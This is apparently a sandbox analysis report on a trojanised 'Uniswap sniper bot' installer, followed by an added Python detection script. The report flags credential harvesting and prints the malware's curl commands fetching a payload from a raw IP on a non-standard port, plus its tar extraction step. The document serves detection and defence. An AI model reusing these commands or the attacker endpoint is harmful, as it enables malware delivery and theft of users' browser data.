Windows
Analysis Report
my2gf4tNEk.exe
Overview
General Information
Sample name: | my2gf4tNEk.exe (renamed because the original name is a hash value) |
Original sample name: | f91bb20852c14222a0c193ce50c7042d.exe |
Analysis ID: | 1568606 |
MD5: | f91bb20852c14222a0c193ce50c7042d |
SHA1: | 748d01320660cfe183d5fa06165c82b1797a94b6 |
SHA256: | a2190824ca378c0de1a97170032ba64a5c456db3071edeaab701075365990af1 |
Tags: | exe, user-smica83 |
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
AI detected suspicious sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- my2gf4tNEk.exe (PID: 4088 cmdline: "C:\Users\user\Desktop\my2gf4tNEk.exe" MD5: F91BB20852C14222A0C193CE50C7042D)
  - cmd.exe (PID: 1464 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv | "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - tasklist.exe (PID: 5952 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
  - find.exe (PID: 5160 cmdline: "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
- uniswap-sniper-bot-with-gui.exe (PID: 3080 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" MD5: 2940B5A37A1E25EC8B2E0AD5943CD934)
  - cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 2420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - curl.exe (PID: 5828 cmdline: curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  - uniswap-sniper-bot-with-gui.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1912,i,12440125917234226040,14168537855868665804,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934)
  - explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  - uniswap-sniper-bot-with-gui.exe (PID: 1096 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1912,i,12440125917234226040,14168537855868665804,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934)
  - uniswap-sniper-bot-with-gui.exe (PID: 3180 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=6966340881 --mojo-platform-channel-handle=2348 --field-trial-handle=1912,i,12440125917234226040,14168537855868665804,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934)
  - cmd.exe (PID: 416 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - curl.exe (PID: 528 cmdline: curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  - cmd.exe (PID: 5912 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - tar.exe (PID: 1484 cmdline: tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)
  - uniswap-sniper-bot-with-gui.exe (PID: 7040 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 --field-trial-handle=1912,i,12440125917234226040,14168537855868665804,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934)
- cleanup
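The chain worth detecting in the tree above is the Electron main process spawning cmd.exe /d /s /c "curl -Lo <Temp>\p.zi http://185.153.182.241:1224/pdown" and, under the same parent, cmd.exe /d /s /c "tar -xf <Temp>\p2.zip -C C:\Users\user": a LOLBin download from a raw IP on a non-standard port into Temp, followed by extraction into the user profile. The following hunt logic is an added example, not part of the sandbox report or of any product; it assumes Sysmon Event ID 1 field names (Image, CommandLine, ProcessId, ParentProcessId, UtcTime) and runs over constructed events that mirror the report's command lines. It correlates on the parent of the cmd.exe wrappers because Electron's child_process.exec produces exactly that wrapper, so curl and tar each have a different cmd.exe parent but share a grandparent.

```python
r"""Hunt logic for the download-then-extract chain in the process tree:
cmd.exe /d /s /c "curl -Lo <Temp>/p.zi http://<raw-ip>:1224/..." and, under the
same parent, cmd.exe /d /s /c "tar -xf <Temp>/p2.zip -C <profile dir>".

Added example, not code from the sandbox report. Event field names follow
Sysmon Event ID 1 and the events in SAMPLE_EVENTS are constructed (assumptions).
"""
import re
from collections import defaultdict

# Ports on which HTTP(S) is unremarkable; anything else is the report's
# "known network protocol on non-standard port" heuristic.
STANDARD_WEB_PORTS = {80, 443, 8080, 8443}

URL_RE = re.compile(r'https?://(?P<host>[^/:\s"\']+)(?::(?P<port>\d{1,5}))?', re.I)
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
TEMP_RE = re.compile(r'[A-Z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\', re.I)
DOWNLOADER_RE = re.compile(r'\b(curl|wget)(\.exe)?"?\s', re.I)
# tar -x... <archive> -C <dest>; quotes optional around both paths
TAR_EXTRACT_RE = re.compile(
    r'\btar(\.exe)?"?\s+-\w*x\w*\s+(?P<archive>"?[^"\s]+"?)\s+-C\s+(?P<dest>"?[^"\s]+"?)', re.I)


def url_findings(cmdline):
    """[(host:port, reason)] for each URL whose host is a raw IPv4 address
    or whose port is outside STANDARD_WEB_PORTS."""
    out = []
    for m in URL_RE.finditer(cmdline):
        host = m.group('host')
        https = m.group(0).lower().startswith('https')
        port = int(m.group('port') or (443 if https else 80))
        reasons = []
        if IPV4_RE.match(host):
            reasons.append('raw IP (no DNS query)')
        if port not in STANDARD_WEB_PORTS:
            reasons.append(f'non-standard port {port}')
        if reasons:
            out.append((f'{host}:{port}', '; '.join(reasons)))
    return out


def classify(event):
    """('download', findings), ('extract', dest_dir) or None. The cmd.exe
    /d /s /c wrapper carries the inner command line, so the wrapper and the
    direct curl/tar child are both recognised."""
    cmd = event['CommandLine']
    if DOWNLOADER_RE.search(cmd) and TEMP_RE.search(cmd):
        hits = url_findings(cmd)
        if hits:
            return ('download', hits)
    m = TAR_EXTRACT_RE.search(cmd)
    if m and TEMP_RE.search(m.group('archive')) and not TEMP_RE.search(m.group('dest')):
        return ('extract', m.group('dest').strip('"'))
    return None


def detect(events, window_s=600):
    """One alert per parent process that downloaded into Temp from a suspicious
    URL and, within window_s seconds, extracted a Temp archive elsewhere."""
    by_parent = defaultdict(list)
    for ev in events:
        tag = classify(ev)
        if tag:
            by_parent[ev['ParentProcessId']].append((ev, tag))
    alerts = []
    for ppid, tagged in sorted(by_parent.items()):
        downloads = [(ev, v) for ev, (kind, v) in tagged if kind == 'download']
        extracts = [(ev, v) for ev, (kind, v) in tagged if kind == 'extract']
        for xev, dest in extracts:
            urls = sorted({u for dev, hits in downloads for u, _ in hits
                           if 0 <= xev['UtcTime'] - dev['UtcTime'] <= window_s})
            if urls:
                alerts.append({'parent': ppid, 'urls': urls,
                               'extract_to': dest, 'extract_pid': xev['ProcessId']})
    return alerts


# Constructed events mirroring the report's tree (UtcTime in seconds) plus
# one benign control: a download from a named host on 443 under another parent.
SAMPLE_EVENTS = [
    {'UtcTime': 100, 'ProcessId': 1464, 'ParentProcessId': 4088, 'Image': r'C:\Windows\system32\cmd.exe',
     'CommandLine': r'"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" '
                    r'/FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv | '
                    r'"C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"'},
    {'UtcTime': 120, 'ProcessId': 6316, 'ParentProcessId': 3080, 'Image': r'C:\Windows\system32\cmd.exe',
     'CommandLine': r'C:\Windows\system32\cmd.exe /d /s /c "curl -Lo '
                    r'"C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown""'},
    {'UtcTime': 121, 'ProcessId': 5828, 'ParentProcessId': 6316, 'Image': r'C:\Windows\system32\curl.exe',
     'CommandLine': r'curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://185.153.182.241:1224/pdown"'},
    {'UtcTime': 180, 'ProcessId': 5912, 'ParentProcessId': 3080, 'Image': r'C:\Windows\system32\cmd.exe',
     'CommandLine': r'C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user"'},
    {'UtcTime': 181, 'ProcessId': 1484, 'ParentProcessId': 5912, 'Image': r'C:\Windows\system32\tar.exe',
     'CommandLine': r'tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user'},
    {'UtcTime': 190, 'ProcessId': 7000, 'ParentProcessId': 9999, 'Image': r'C:\Windows\system32\curl.exe',
     'CommandLine': r'curl -Lo "C:\Users\user\AppData\Local\Temp\tool.zip" "https://example.com/tool.zip"'},
]

if __name__ == '__main__':
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
</test>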
⊘No configs have been found
⊘No yara matches
Sigma rule: | Usage Of Web Request Commands And Cmdlets | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger |
⊘No Suricata rule has matched
AV Detection |
---|
Source: | Integrated Neural Analysis Model (match details not preserved in this extraction) |
Source: | Further behaviour rows whose section headings and details were not preserved: Static PE information (2), Registry value created (1), File created (2), Binary string (4), File opened (6) |
Networking |
---|
Source: | Network traffic detected (7), TCP traffic (1), HTTP traffic detected (4), IP Address (2), TCP traffic detected without corresponding DNS query (50); endpoint details were not preserved in this extraction |